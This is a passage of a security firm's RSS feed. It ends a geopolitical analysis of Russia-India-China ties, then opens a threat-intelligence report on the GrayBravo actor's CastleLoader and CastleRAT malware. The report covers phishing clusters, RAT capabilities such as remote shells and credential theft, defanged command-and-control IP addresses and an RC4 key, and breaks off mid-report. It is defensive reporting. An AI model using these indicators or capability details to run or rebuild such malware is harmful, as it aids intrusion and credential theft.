href="https://www.ndtv.com/world-news/explained-india-china-border-patrol-agreement-and-why-it-is-important-6844560">disengagement</a> of troops. 
Even with border tensions currently defused, the overarching territorial dispute very likely <a href="https://warontherocks.com/2025/09/the-limits-of-rapprochement-between-india-and-china/">persists</a> as a potential strategic flashpoint in the future. As such, military cooperation is unlikely; after the 2025 SCO summit, Modi did not attend the military parade organized in Beijing to commemorate the 80th anniversary of the end of World War II.</p>
        <p>In addition, China’s efforts to assert military power via naval exercises in the Indian Ocean Region (IOR) are likely a particular point of contention between China and India. China’s People’s Liberation Army (PLA) is increasingly active <a href="https://www.iiss.org/online-analysis/charting-china/2025/05/china-in-the-indian-ocean-a-stronger-indo-pacific-presence/">throughout</a> the IOR, often as part of air, land, and sea-based multilateral exercises but also to <a href="https://web.archive.org/web/20250925141545/https://news.cctv.com/2024/04/21/ARTI7yNAn6ts4xOPCejjB2v8240421.shtml">support</a> the PLA Navy’s “Far Seas Protection” <a href="https://digital-commons.usnwc.edu/cgi/viewcontent.cgi?article=1012&amp;context=cmsi-maritime-reports">strategy</a>. In addition to military exercises, the PLA makes <a href="https://c4ads.org/reports/harbored-ambitions/">use</a> of <a href="https://direct.mit.edu/isec/article-abstract/46/4/9/111175/Pier-Competitor-China-s-Power-Position-in-Global?redirectedFrom=fulltext">commercial ports</a> in the IOR, some of which are owned or operated by Chinese state-owned enterprises. New Delhi very likely <a href="https://www.indiatimes.com/news/india/here-is-all-you-should-know-about-string-of-pearls-china-s-policy-to-encircle-india-324315.html">perceives</a> China’s regional cultivation of dual-use commercial ports, naval base in Djibouti, and likely naval facility access in Cambodia — sometimes <a href="https://www.idsa.in/askanexpert/dattatreaya-nimbalkar-asked-why-has-indias-necklace-of-diamonds-strategy-in-the-indian-ocean-region-not-been-as-successful-compared-to-chinas-string-of-pearls-strategy">referred to</a> as a “string of pearls” strategy by analysts outside of China — as an <a href="https://timesofindia.indiatimes.com/blogs/everything-under-the-sun/india-vs-china-the-string-of-pearls-and-belt-road/">encirclement</a> of India in what New Delhi considers its regional maritime domain. 
This competition has played out at ports across the region. For example, in 2022, China and India <a href="https://direct.mit.edu/isec/article/47/3/174/114671/Correspondence-Debating-China-s-Use-of-Overseas">competed</a> to influence Sri Lanka’s decision regarding China’s request to dock a military vessel at the China-owned and operated Port of Hambantota; the ship ultimately <a href="https://www.reuters.com/world/asia-pacific/chinese-military-ship-leaves-sri-lanka-after-controversial-visit-2022-08-22/">called</a> at the port over New Delhi’s objections. In 2023, India <a href="https://thediplomat.com/2023/11/what-swirls-beneath-research-activity-of-chinese-ships-in-the-indian-ocean/">objected</a> to the presence of a Chinese state-owned research vessel, which China very likely uses to <a href="https://features.csis.org/hiddenreach/china-indian-ocean-research-vessels/">support</a> PLA <a href="https://digital-commons.usnwc.edu/cmsi-maritime-reports/3/">requirements</a>. In support of their territorial claims and very likely to facilitate military contingencies, China and India have worked to <a href="https://chinapower.csis.org/analysis/china-upgrading-dual-use-xiaokang-villages-india-border/">build out</a> relevant <a href="https://southasianvoices.org/sec-f-in-n-sino-indian-renewable-competition-3-18-2025/">infrastructure</a> along disputed border areas.</p>
        <p>Finally, China likely views New Delhi’s joint military exercises with third parties as evidence that India is preparing for a China contingency. In 2022, an annual <a href="https://thediplomat.com/2022/11/india-us-armies-hold-exercises-close-to-disputed-china-border/">exercise</a> with the US took place just 62 miles from a disputed border area. In 2024, India <a href="https://www.thehindu.com/news/national/iafs-largest-multilateral-exercise-tarang-shakti-to-see-participation-of-over-150-aircraft/article68469453.ece">organized</a> the first Tarang Shakti air combat exercise, which involved ten countries, including the US. In 2025, India and the Philippines <a href="https://www.aljazeera.com/news/2025/8/4/philippines-india-hold-first-joint-naval-drill-in-disputed-south-china-sea">conducted</a> a joint naval drill in the South China Sea. India almost certainly views China’s military <a href="https://www.orfonline.org/research/how-china-and-pakistan-work-against-india">cooperation and integration</a> with Pakistan –– including China’s role as Islamabad’s main supplier of arms –– as a grave threat to Indian security. China is <a href="https://www.sipri.org/sites/default/files/2025-03/fs_2503_at_2024_0.pdf">responsible</a> for 81% of Pakistan’s arms imports.</p>
        <h3>India-Russia Relationship: Longstanding and Rooted in Arms Sales and Trade</h3>
        <p>India and Russia have had a close partnership since at least the 1950s, very likely anchored by a mutual desire to push back against perceived US hegemony, Russian arms sales to India, and, more recently, an increase in Indian purchases of Russian oil. In 2010 and <a href="https://www.mea.gov.in/bilateral-documents.htm?dtl%2F37940%2FJoint+Statement+following+the+22nd+IndiaRussia+Annual+Summit">2024</a>, India and Russia <a href="https://www.mea.gov.in/portal/countryquicklink/597_russia_january_2014.pdf">defined</a> their relationship as a “Special and Privileged Partnership.” Following a July 2024 summit, Modi and Putin <a href="https://www.mea.gov.in/bilateral-documents.htm?dtl%2F37940%2FJoint+Statement+following+the+22nd+IndiaRussia+Annual+Summit">issued</a> a statement calling the India-Russia partnership a “time-tested relationship which is based on trust, mutual understanding and strategic convergence.”</p>
        <h4>Political Dynamics</h4>
        <p>India and Russia’s political partnership very likely dates back to at least the 1950s, when the Soviet Union used its UN veto to <a href="https://research.un.org/en/docs/sc/quick">support</a> India’s claims on Kashmir, and is anchored by a shared strategic interest in re-balancing post-Cold War US hegemony in favor of a multipolar world order. New Delhi has <a href="https://research.un.org/en/docs/sc/quick">called</a> Moscow “key to India’s quest for a stable Asian balance of power.” However, India and Russia’s visions for what a multipolar world looks like very likely differ. India’s principle of multi-alignment aims to <a href="https://economictimes.indiatimes.com/news/india/india-is-non-west-but-not-anti-west-jaishankar/articleshow/106531511.cms?from=mdr">reform</a> global power dynamics and is not anti-West, in contrast to Russia’s goal of <a href="https://direct.mit.edu/isec/article/49/3/50/128035/Quo-Vadis-Russian-Deterrence-Strategic-Culture-and">ushering</a> in a world in which Russia, China, and the US are on equal footing. Indian Foreign Minister Subrahmanyam Jaishankar has <a href="https://economictimes.indiatimes.com/news/india/india-is-non-west-but-not-anti-west-jaishankar/articleshow/106531511.cms?from=mdr">articulated</a> that India’s “non-West” character does not mean it is “anti-West.” Jaishankar’s book on India’s foreign policy, <em>Why Bharat Matters</em>, <a href="https://www.academia.edu/116195958/Why_Bharat_Matters_2024_">asserts</a> that India’s approach that distanced itself from the West “has led [India] to develop dependencies elsewhere” — yet specifically asserts that India “must realize that there is little profit in being anti-West.”</p>
        <p>India’s diplomatic approach to Russia suggests it is willing to occasionally compromise on its <a href="https://theloop.ecpr.eu/indias-sovereignty-paradox-neutrality-oil-and-the-price-of-multi-alignment/">declared</a> neutral, non-aligned strategy. India <a href="https://web.archive.org/web/20230227221317/https://economictimes.indiatimes.com/news/india/are-we-anywhere-near-a-possible-solution-acceptable-to-both-sides-india-abstains-in-unga-on-ukraine-resolution/articleshow/98194298.cms">abstained</a> on multiple UN resolutions relating to Russia’s invasion and Ukraine’s sovereignty, has not taken a condemnatory stance against Russia’s invasion of Ukraine, and consistently <a href="https://www.mea.gov.in/bilateral-documents.htm?dtl/38214/IndiaUkraine_Joint_Statement_on_the_Visit_of_Prime_Minister_of_India_to_Ukraine#:~:text=The%20Indian%20side%20reiterated%20its,%2C%20Switzerland%2C%20in%20June%202024.">calls</a> for a “peaceful resolution through dialogue and diplomacy.” Modi and Putin have publicly <a href="https://timesofindia.indiatimes.com/india/putin-dials-modi-pm-thanks-friend-for-bday-wishes-india-ready-to-help-in-ukraine-peace-efforts/articleshow/123946697.cms">maintained</a> a warm friendship despite US and European criticism of Russia, and Modi has <a href="https://www.theguardian.com/world/article/2024/jul/09/modi-putin-summit-bonds-of-friendship-ukraine-tensions">referred</a> to Russia as India’s “all-weather friend and trusted ally.”</p>
        <h4>Economic Dynamics</h4>
        <p>Russia very likely views India as a critical, longstanding market for Russian weapons and, increasingly since Russia’s full-scale invasion of Ukraine in 2022, an economic partner that helps Russia recoup revenue lost due to Western sanctions. India’s import of crude oil from Russia increased from $2.3 billion in 2021 to $52.7 billion in 2024, despite Western sanctions on Russia. India’s Ministry of External Affairs has <a href="https://www.mea.gov.in/response-to-queries.htm?dtl%2F39812%2FOfficial_Spokespersons_response_to_media_queries_regarding_recent_EU_sanctions_July_18_2025">stated</a> that India “does not subscribe to any unilateral sanctions measures,” and “considers the provision of energy security a responsibility of paramount importance to meet the basic needs of its citizens.” Since 2023, Russia <a href="https://www.reuters.com/markets/commodities/russia-squeezes-mideast-opec-shares-indias-oil-market-historic-lows-2024-04-19">has been</a> India’s top supplier of crude oil, and Russian oil <a href="https://oilprice.com/Energy/Energy-General/Disregarding-US-Sanctions-India-Continues-to-Buy-Russian-Crude.html">exceeded</a> 40% of India’s overall crude imports by May 2025. As a result, India is now the second-largest purchaser of Russian crude oil after China. Discounted Russian oil has fueled India’s surging energy needs and <a href="https://oec.world/en/profile/bilateral-product/refined-petroleum/reporter/ind">enabled</a> it to become the third-largest exporter of refined petroleum products, which is India’s most exported product. Even after US President Donald Trump imposed a 50% tariff on India to dissuade it from continuing to buy Russian oil, Indian oil imports <a href="https://indianexpress.com/article/business/indias-russian-oil-imports-robust-in-sept-so-far-crude-loadings-from-ports-stable-10254256/">remained</a> steady in the first half of September 2025. 
The US subsequently <a href="https://home.treasury.gov/news/press-releases/sb0290">imposed</a> sanctions on Russian oil exporters Lukoil and Rosneft on October 22, 2025, prompting Indian refiners to <a href="https://www.reuters.com/business/energy/indian-refiners-await-clarity-new-russian-oil-orders-2025-10-28/">pause</a> new orders and seek alternatives for sanctioned Russian oil. On October 28, an India-bound tanker carrying Russian crude <a href="https://timesofindia.indiatimes.com/business/india-business/sign-of-oil-trade-disruption-after-trump-sanctions-russian-crude-oil-tanker-headed-for-india-takes-a-u-turn-now-idling-in-baltic-sea/articleshow/124897820.cms">turned around</a> in the Baltic Sea — an incident that oil analysts <a href="https://oilprice.com/Latest-Energy-News/World-News/Russian-Oil-Tanker-Turns-Back-Under-US-Sanctions-Threat.html">attributed</a> to the US sanctions pressure. However, Indian Oil <a href="https://www.reuters.com/business/energy/indian-oil-buys-russian-crude-non-sanctioned-entities-sources-say-2025-10-31/">continued</a> to purchase Russian crude from non-sanctioned entities, suggesting the US sanctions are likely to impact, but not halt, India’s imports from Russia.</p>
        <p>Total trade between India and Russia <a href="https://ibef.org/indian-exports/india-russia-trade">amounted</a> to $68.7 billion in FY2025, likely <a href="https://www.orfonline.org/expert-speak/a-deep-dive-into-the-india-russia-economic-relations">surging</a> as a result of the vacuum left by Western firms. However, India’s imports from Russia account for $63.8 billion, over 90% of the total trade, reflecting a significant trade imbalance. Even so, New Delhi <a href="https://timesofindia.indiatimes.com/india/trade-deficit-rising-due-to-oil-buy-need-to-address-it-eam-in-russia/articleshow/123418117.cms">aims</a> to achieve $100 billion in trade with Russia by 2030. Both countries seek to <a href="https://timesofindia.indiatimes.com/business/india-business/rupee-rouble-rule-what-rbi-move-means-for-russia-trade/articleshow/123269562.cms">reduce</a> reliance on the US dollar, and 90% of trade is now <a href="https://m.economictimes.com/news/economy/foreign-trade/rupee-rouble-rule-rbi-clears-path-for-faster-india-russia-payments/articleshow/123277090.cms">settled</a> in ruble-rupee transactions. However, India’s trade with the West will likely <a href="https://indianexpress.com/article/business/banking-and-finance/as-russia-seeks-to-expand-trade-in-rupee-rouble-rbi-sebi-remain-wary-9608947/">complicate</a> financial integration; India has been <a href="https://www.theweek.in/news/india/2024/12/03/india-finance-ministry-parliament-response-new-brics-currency-payment-system.html">hesitant</a> to adopt sanctions-resistant payment networks with Russia and has <a href="https://economictimes.indiatimes.com/news/india/india-seeks-rupees-global-reach-but-no-plan-to-replace-us-dollar-eam-s-jaishankar/articleshow/118747922.cms?from=mdr">dismissed</a> the idea of replacing the US dollar.</p>
        <h4>Military Dynamics</h4>
        <p>We assess that India and Russia’s military relationship is <a href="https://warontherocks.com/2025/09/guns-oil-and-dependence-can-the-russo-indian-partnership-be-torpedoed/">centered</a> on Russia’s long history of exporting weapons to India, which has created an Indian dependence on Russian systems. Over the past twenty years, India has <a href="https://warontherocks.com/2025/04/friends-with-limits-the-future-of-russo-indian-defense-ties/">purchased</a> roughly $60 billion in Russian weapons, amounting to 65% of its total weapons imports. India’s purchases <a href="https://www.thedefensenews.com/news-details/Russia-Offers-S-400-Tech-Transfer-to-India--Local-Manufacturing-of-S-400-Components/">include</a> Russia’s S-400 missile defense system, which India <a href="https://www.ndtv.com/india-news/pak-missile-attack-india-15-cities-targeted-india-uses-harpy-drones-s-400-missile-defence-system-to-counter-pak-attack-8362473">used</a> in May 2025 to repel Pakistani missile attacks. India and Russia have also <a href="https://www.cna.org/reports/2025/08/Russia-India-Relations-Multipolarity-in-Practice.pdf">pursued</a> joint production of weapons, including T-90 tanks and Su-30MKI aircraft. India-Russia military cooperation has <a href="https://www.cna.org/reports/2025/08/Russia-India-Relations-Multipolarity-in-Practice.pdf">stagnated</a> on other fronts, such as joint training and exercises.</p>
        <p>Although Moscow <a href="https://www.newindianexpress.com/nation/2025/Mar/11/russia-remains-top-arms-supplier-to-india-sipri-report">continues to be</a> India’s main arms supplier, India’s arms purchases from Russia have declined since 2024, as India has <a href="https://idrw.org/pressure-mounts-on-russia-to-offer-niche-military-supplies-to-india-amid-push-for-reduced-dependency/">sought</a> to <a href="https://www.business-standard.com/external-affairs-defence-security/news/india-looks-west-for-cutting-edge-weapons-to-reduce-reliance-on-russia-124120300498_1.html">reduce</a> its reliance on Russia and increasingly purchase from Western suppliers, including France, Israel, and the US. On October 31, 2025, India and the US <a href="https://timesofindia.indiatimes.com/india/new-chapter-rajnath-singh-meets-us-secretary-of-war-pete-hegseth-signs-10-yr-defence-framework/articleshow/124985959.cms">signed</a> a ten-year Defense Framework Agreement, which Indian Defense Minister Rajnath Singh described as the start of a “new chapter” in India-US defense cooperation and “a signal of our growing strategic convergence.” This agreement likely reflects India’s intent to continue diversifying its military cooperation and arms trade beyond Russia, and shore up its US partnership amid tariff-related strife — further reinforcing the multi-alignment doctrine driving India’s security calculations and reducing the likelihood of a Russia-India-China military alliance.</p>
        <p>The <a href="https://www.rand.org/pubs/commentary/2024/08/something-is-rotten-in-the-state-of-russian-arms-industry.html">documented</a> poor performance of Russian weapons systems in Ukraine likely impacts India’s calculus. A leak by hacker collective “Black Mirror” <a href="https://defencesecurityasia.com/en/india-mig29k-radar-leak-russia-zhukme-blackmirror/">revealed</a> internal documents from Russia’s state-owned defense conglomerate Rostec <a href="https://militarnyi.com/en/news/russian-zhuk-me-radar-undermined-combat-capability-of-indian-mig-29s/">detailing</a> how the Russian-manufactured radar system installed in India’s MiG-29K fighter aircraft suffered extensive and systemic failures between 2016 and 2019; this lack of reliability likely encouraged India’s move away from Russian weapons.</p>
        <h2>State of the Nascent Trilateral Dynamic and Indicators of Deepening Trilateral Cooperation</h2>
        <p>China, India, and Russia have not declared a formal bloc; instead, in recent months, the three states have taken primarily diplomatic steps to project increased interest in trilateral engagement –– most notably a meeting between Modi, Putin, and Xi at the 2025 SCO Summit. Though the three states did not make any concrete commitments at the summit, the meeting represents the first time all three leaders have met in person since 2019, and very likely reflects an effort by Russia and China to exploit strains in the US-India relationship to draw India away from the US.</p>
        <p>Past trilateral engagement, which has primarily occurred at multilateral fora such as BRICS, SCO, and G20 Summits, has not resulted in a solidified, institutionalized trilateral bloc due to divergent national interests that will likely pose a long-term structural impediment. These strategic differences will likely persist and continue to limit the depth and breadth of alignment among the three countries, making it less likely that a solidified trilateral bloc will emerge in the short term. The three primary multilateral fora where trilateral engagement (short of formation of a bloc) has occurred are the now-dormant RIC format, BRICS, and the SCO.</p>
        <h4>RIC Format: Dormant, Though Russia and China Are Interested in Reviving It</h4>
        <p>The RIC format is likely the multilateral forum in which trilateral engagement would primarily take place, given the apparent interest of Beijing and Moscow in reviving the dormant discussion format and New Delhi’s apparent reserved openness to the possibility. The RIC format, which began formally in 2007 and involves trilateral discussions among the foreign ministers of these countries, has been inactive since late 2021.</p>
        <p>Between 2002 and 2020, twenty trilateral ministerial-level <a href="https://www.firstpost.com/explainers/russia-india-china-ric-troika-revival-explained-13908388.html">meetings</a> occurred, covering topics such as trade, energy, and disaster management. At the most recent RIC foreign ministers <a href="https://web.archive.org/web/20211127014320/https://www.mea.gov.in/bilateral-documents.htm?dtl/34540/joint+communique+of+the+18th+meeting+of+the+foreign+ministers+of+the+russian+federation+the+republic+of+india+and+the+peoples+republic+of+china">meeting</a> in November 2021, the three countries expressed interest in regular high-level meetings, reiterated the importance of international reform for a multipolar and rebalanced world, and opposed unilateral sanctions imposed outside of the UNSC.</p>
        <p>In a 2022 joint statement, China and Russia <a href="https://www.airuniversity.af.edu/Portals/10/CASI/documents/Translations/2022-02-04%20China%20Russia%20joint%20statement%20International%20Relations%20Entering%20a%20New%20Era.pdf">declared</a> their intent to develop cooperation within the RIC format, a sentiment Russian Foreign Minister Sergey Lavrov <a href="https://thediplomat.com/2025/07/is-the-russia-india-china-troika-making-a-comeback/">reiterated</a> in May 2025. In July 2025, an Indian government spokesperson neither rejected nor explicitly supported the revival of the RIC format, likely <a href="https://web.archive.org/web/20250925171754/https://www.mea.gov.in/media-briefings.htm?dtl/39809/Transcript_of_Weekly_Media_Briefing_by_the_Official_Spokesperson_July_17_2025">indicating</a> India’s reserved openness to it.</p>
        <h4>BRICS: Ill-Equipped to Institutionalize Trilateral Engagement, Though Opportunities Remain for Economic Engagement</h4>
        <p>The BRICS (Brazil, Russia, India, China, and South Africa) bloc is active, though very likely ill-equipped to facilitate the institutionalization of a trilateral Russia-India-China bloc due to its status as an informal coordinating body, as opposed to an organization that requires mutual commitments. BRICS was formed in 2009 and is an organization <a href="http://www.brics.utoronto.ca/docs/090616-leaders.html">committed</a> to perpetuating a multipolar world via political, security, and economic cooperation.</p>
        <p>Though Russia and China have <a href="https://www.usip.org/publications/2024/10/whats-driving-bigger-brics-and-what-does-it-mean-us">sought</a> to make BRICS a geostrategic bloc to rival the West, the organization does not bind its member states to any treaty, alliance, or formal legal structure, thereby limiting the organization’s ability to institutionalize a geostrategic bloc. India <a href="https://www.isas.nus.edu.sg/papers/indias-role-in-the-brics-navigating-the-balance-in-a-changing-world/#_ftnref8">views</a> the forum as a key balancing factor in its nuanced multi-alignment strategy, in which New Delhi seeks to position itself as a bridge between Western and non-Western fora.</p>
        <p>Despite the overall limitations of the BRICS structure, the connectivity it provides for financial institutions likely raises the possibility of BRICS facilitating trilateral economic integration, should China, India, and Russia choose to pursue that sort of cooperation. BRICS has established two financial institutions, both of which are <a href="https://researchbriefings.files.parliament.uk/documents/CBP-10136/CBP-10136.pdf">based</a> on foundational treaties. The New Development Bank (NDB) <a href="https://www.ndb.int/wp-content/uploads/2022/07/NDB_StrategyDocument_Eversion-1.pdf">supports</a> collaborative development projects in emerging markets and developing countries, and the Contingent Reserve Arrangement ensures BRICS’s central banks provide mutual support during a currency crisis. BRICS’s interconnected financial systems could facilitate trilateral economic activity and offer a way for the three countries to conduct trade payments.</p>
        <p>We assess that BRICS could also facilitate Russia and China’s <a href="https://carnegieendowment.org/research/2023/12/the-difficult-realities-of-the-brics-dedollarization-effortsand-the-renminbis-role?lang=en">efforts</a> to develop alternatives to the US dollar, though India’s <a href="https://www.indiatoday.in/india-today-insight/story/as-brics-debates-reducing-dollar-dependence-why-india-is-walking-a-fine-line-2753797-2025-07-10">hesitation</a> to aggressively push for de-dollarization likely limits the extent to which de-dollarization will become an area for trilateral engagement. BRICS nations have <a href="https://responsiblestatecraft.org/dedollarization-china-russia/">explored</a> the development of a common currency and have specifically <a href="https://www.thenationalnews.com/business/2025/07/13/brics-brazil-china-us/">created</a> a cross-border digital payment and messaging system backed by cryptocurrency, <a href="https://www.brics-pay.com/">called</a> BRICS Pay. During the July 2025 BRICS summit in Rio de Janeiro, Brazil, member countries reportedly made progress in “<a href="https://dirco.gov.za/wp-content/uploads/2025/07/2025.07.05.-BRICS-Leaders-Declaration.pdf">identifying</a> possible pathways to support the continuation of discussions on the potential for greater interoperability of BRICS payment systems.”</p>
        <h4>Shanghai Cooperation Organization (SCO): Encumbered by Competing Interests</h4>
        <p>Although Russia, India, and China’s latest trilateral engagement took place at the SCO <a href="https://www.cgtn.com/specials/2025/sco-summit-.html">Summit</a> in 2025, the SCO is unlikely to facilitate a deeper trilateral relationship, as it is encumbered by competing interests. The SCO was founded in 2001 to <a href="https://www.iiss.org/publications/strategic-comments/2018/shanghai-cooperation-organisation/">focus</a> on border security and ethnic minority separatism in China’s Xinjiang region, though it has since <a href="https://web.archive.org/web/20231128043631/https://eng.sectsco.org/20231127/1168690.html">expanded</a> to encompass counter-drug trafficking efforts, coordination in support of economic development, wider security-relevant matters, and other activities. India <a href="https://web.archive.org/web/20211108024435/https://eoibeijing.gov.in/eoibejing_pages/NDc,">joined</a> in 2017, after being an observer since 2005, with Russia’s support and possibly <a href="https://archive.ph/k5ehF">without</a> China’s, as Beijing sponsored Pakistan’s membership that same year.</p>
        <p>China and Russia have used the SCO to advance their geopolitical aims, including <a href="https://web.archive.org/web/20250509070130/https://www.gov.cn/yaowen/liebiao/202505/content_7023051.htm">shaping</a> future multipolarism and <a href="https://www.uscc.gov/sites/default/files/2020-11/Shanghai_Cooperation_Organization-Testbed_for_Chinese_Power_Projection.pdf">projecting</a> power. In particular, China uses the SCO as a foundation for <a href="https://carnegieendowment.org/research/2025/08/a-new-world-cop-on-the-beat-chinas-internal-security-outreach-under-the-global-security-initiative?lang=en">expanding</a> an international security architecture that is consistent with the CCP’s regime security.</p>
        <p>We assess that the SCO’s institutional capacity to take unified action is limited, in part by the fact that its members are not consistently <a href="https://merics.org/en/comment/china-and-russia-are-using-shanghai-cooperation-organization-push-alternative-global-order">aligned</a>. For example, India initially did not <a href="https://web.archive.org/web/20250616091522/https://www.mea.gov.in/Speeches-Statements.htm?dtl/39670/Statement+on+the+Shanghai+Cooperation+Organization+SCO">participate</a> in crafting a SCO statement criticizing Israeli and US strikes against Iran in June 2025, although it later <a href="https://thewire.in/diplomacy/after-june-rebuff-india-backs-sco-statement-condemning-israeli-us-strikes-on-iran">joined</a> a different SCO statement condemning the same activities. The SCO did not stop China-India border clashes in 2020, although it helped <a href="https://jamestown.org/program/the-shanghai-cooperation-organizations-limited-role-in-easing-tensions-between-china-and-india/">facilitate</a> bilateral discussions. Following the 2025 clashes between India and Pakistan, India reportedly <a href="https://www.euronews.com/2025/06/26/india-rejects-shanghai-cooperation-organisation-statement-over-claims-it-favoured-pakistan">objected</a> to an SCO statement it viewed as undermining its own position. According to one Chinese think tank director, India is <a href="https://web.archive.org/web/20250819022442/https://thechinaacademy.org/india-as-the-scos-troubled-guest/">using</a> the SCO to contain China’s influence and push back on its development and security initiatives, such as the BRI.</p>
        <h4>Indicators of Deeper Trilateral Cooperation</h4>
        <p>The table below highlights potential indicators of increasing trilateral cooperation in the future, as well as the factors most likely limiting trilateral cooperation today and going forward. China-India tension is very likely the primary constraint to the development of a trilateral bloc.</p>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/research/media_1cac80654eeccc9254abd0ff29dc936da6d1b0a7f.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[GrayBravo’s CastleLoader Activity Clusters Target Multiple Industries]]></title>
            <link>https://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries</guid>
            <pubDate>Tue, 09 Dec 2025 00:00:00 GMT</pubDate>
            <content:encoded><![CDATA[
        <p><em>Note: The analysis cut-off date for this report was November 10, 2025</em></p>
        <h2>Executive Summary</h2>
        <p>Insikt Group continues to monitor GrayBravo (formerly tracked as TAG-150), a technically sophisticated and rapidly evolving threat actor first identified in September 2025. GrayBravo demonstrates strong adaptability, responsiveness to public exposure, and operates a large-scale, multi-layered infrastructure. Recent analysis of GrayBravo’s ecosystem uncovered four distinct activity clusters leveraging the group’s CastleLoader malware, each defined by unique tactics, techniques, and victim profiles. These findings reinforce the assessment that GrayBravo operates a malware-as-a-service (MaaS) model.</p>
        <p>For example, one cluster, tracked as TAG-160, impersonates global logistics firms, using phishing lures and the ClickFix technique to distribute CastleLoader while spoofing legitimate emails and exploiting freight-matching platforms to target victims. Another cluster, tracked as TAG-161, impersonates Booking.com, also employs ClickFix to deliver CastleLoader and Matanbuchus, and uses novel phishing email management tools. Further investigation through historical panel analysis linked the online persona “Sparja”, a user active on Exploit Forums, to potential GrayBravo-associated activities, based on the alias’s distinctiveness and related discussion topics.</p>
        <p>To protect against GrayBravo, security defenders should block IP addresses and domains tied to associated loaders, infostealers, and remote access trojans (RATs), flag and potentially block connections to unusual legitimate internet services (LISs) such as Pastebin, and deploy updated detection rules (YARA, Snort, Sigma) for current and historical infections. Other controls include implementing email filtering and data exfiltration monitoring. See the <strong>Mitigations</strong> section for implementation guidance and <strong>Appendix H</strong> for a complete list of indicators of compromise (IoCs).</p>
        <h2>Key Findings</h2>
        <ul>
          <li>Insikt Group uncovered four distinct activity clusters leveraging GrayBravo’s CastleLoader, each exhibiting unique tactics, techniques, and procedures (TTPs) and victim profiles, reinforcing the assessment that GrayBravo operates a malware-as-a-service (MaaS) ecosystem, as previously hypothesized.</li>
          <li>One cluster, tracked as TAG-160, impersonates logistics firms and deploys phishing lures combined with the ClickFix technique to distribute CastleLoader, while spoofing legitimate emails and abusing freight-matching platforms to engage targets.</li>
          <li>Cluster 2, tracked as TAG-161, impersonates Booking.com and uses ClickFix techniques to deliver CastleLoader and Matanbuchus, relying on threat actor-controlled infrastructure and employing previously unseen phishing email management tooling.</li>
        </ul>
        <h2>Background</h2>
        <p>In September 2025, Insikt Group <a href="https://www.recordedfuture.com/research/from-castleloader-to-castlerat-tag-150-advances-operations">reported</a> on a newly identified threat actor, TAG-150, assessed to have been active since at least March 2025. Since our previous reporting, we have decided to classify TAG-150 as GrayBravo. It is believed to be responsible for developing multiple custom malware families, beginning with CastleLoader and CastleBot, and most recently, CastleRAT. It is characterized by rapid development cycles, technical sophistication, responsiveness to public reporting, and an expansive, evolving infrastructure. Alongside the discovery of the previously undocumented remote access trojan CastleRAT, Insikt Group identified GrayBravo’s multi-tiered infrastructure and its use of various supporting services, including file-sharing platforms and anti-detection tools.</p>
        <p>Although public reporting has suggested that GrayBravo operates under a malware-as-a-service (MaaS) model, supported by its delivery of diverse second-stage payloads, the proliferation of CastleLoader administration panels, and features typical of MaaS platforms, Insikt Group has not identified any advertisements or discussions of this service on underground forums. Recorded Future® Network Intelligence indicates that GrayBravo predominantly interacts with its own infrastructure, with only a limited number of external IP addresses, possibly representing customers or affiliates, observed communicating with it. Many of these connections are routed through Tor nodes, complicating attribution and classification.</p>
        <p>Through continued monitoring, Insikt Group has identified multiple clusters of activity linked to GrayBravo, reinforcing the assessment that the threat actor is operating a MaaS ecosystem (see <strong>Figure 1</strong>). This report details the tactics, techniques, and procedures (TTPs) associated with these clusters, believed to represent potential GrayBravo customers or affiliates. More specifically, Insikt Group identified four clusters linked to GrayBravo’s CastleLoader activity: one targeting the logistics sector (TAG-160), another using Booking.com-themed lures across a wider range of victims (TAG-161), a third also impersonating Booking.com but independent from the previous group, and a fourth distributing CastleLoader through malvertising and fake software updates.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_16f04fa4d373e431d0057b87c0fe966769aa4cac9.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1206" />
        </p>
        <p><em><strong>Figure 1</strong>: Overview of GrayBravo and associated clusters (Source: Recorded Future)</em></p>
        <h2>Threat Analysis</h2>
        <h3>Higher Tier Infrastructure</h3>
        <p>Insikt Group previously identified an extensive, multi-tiered infrastructure tied to GrayBravo. The infrastructure consists of Tier 1 victim-facing C2 servers associated with malware families such as CastleLoader, SecTopRAT, WarmCookie, and the newly discovered CastleRAT, as well as Tier 2, Tier 3, and Tier 4 servers, the latter of which are likely used for backup purposes. <strong>Figure 2</strong> provides an overview of the infrastructure used by GrayBravo.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_135c5c1ab7869c6f3e602baab05488fd0d435962a.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="929" />
        </p>
        <p><em><strong>Figure 2</strong>: Multi-tiered infrastructure linked to GrayBravo (Source: Recorded Future)</em></p>
        <h3>CastleRAT</h3>
        <p>CastleRAT is a remote access trojan (RAT) observed in both C and Python variants that share several core characteristics. Each variant communicates through a custom binary protocol secured with RC4 encryption and hard-coded sixteen-byte keys. Upon execution, CastleRAT queries a geolocation application programming interface (API) using <em>ip-api[.]com</em> to obtain victim geographic location and network details. Both variants support remote command execution and file download and execution, and can establish an interactive remote shell. The C variant exhibits additional capabilities, including browser credential theft, keylogging, and screen capture functionality.</p>
        <h4>Infrastructure Analysis</h4>
        <p>Analysis of CastleRAT C-variant command-and-control (C2) infrastructure reveals notable operational overlap across multiple nodes sharing the RC4 key “NanuchkaUpyachka.” As illustrated in <strong>Figure 3</strong>, Insikt Group observed two CastleRAT C2 servers, <em>104[.]225[.]129[.]171</em> and <em>144[.]208[.]126[.]50</em>, maintain concurrent communications with at least three US-based victims, suggesting coordinated or redundant control channels. The overlapping traffic patterns, observed within the same daily collection windows, indicate that compromised hosts reached out to multiple C2s nearly simultaneously rather than migrating between them over time. This behavior implies a deliberate redundancy strategy employed by the threat actor. Additionally, direct communications between two CastleRAT C variants, <em>104[.]225[.]129[.]171</em> and <em>195[.]85[.]115[.]44</em>, further point to an interconnected infrastructure ecosystem rather than isolated C2 instances. Such internal connectivity could facilitate automated data synchronization, lateral control distribution, or key exchange mechanisms within the threat actor’s tooling, underscoring a more mature coordinated operational model than previously documented.</p>
        <p>
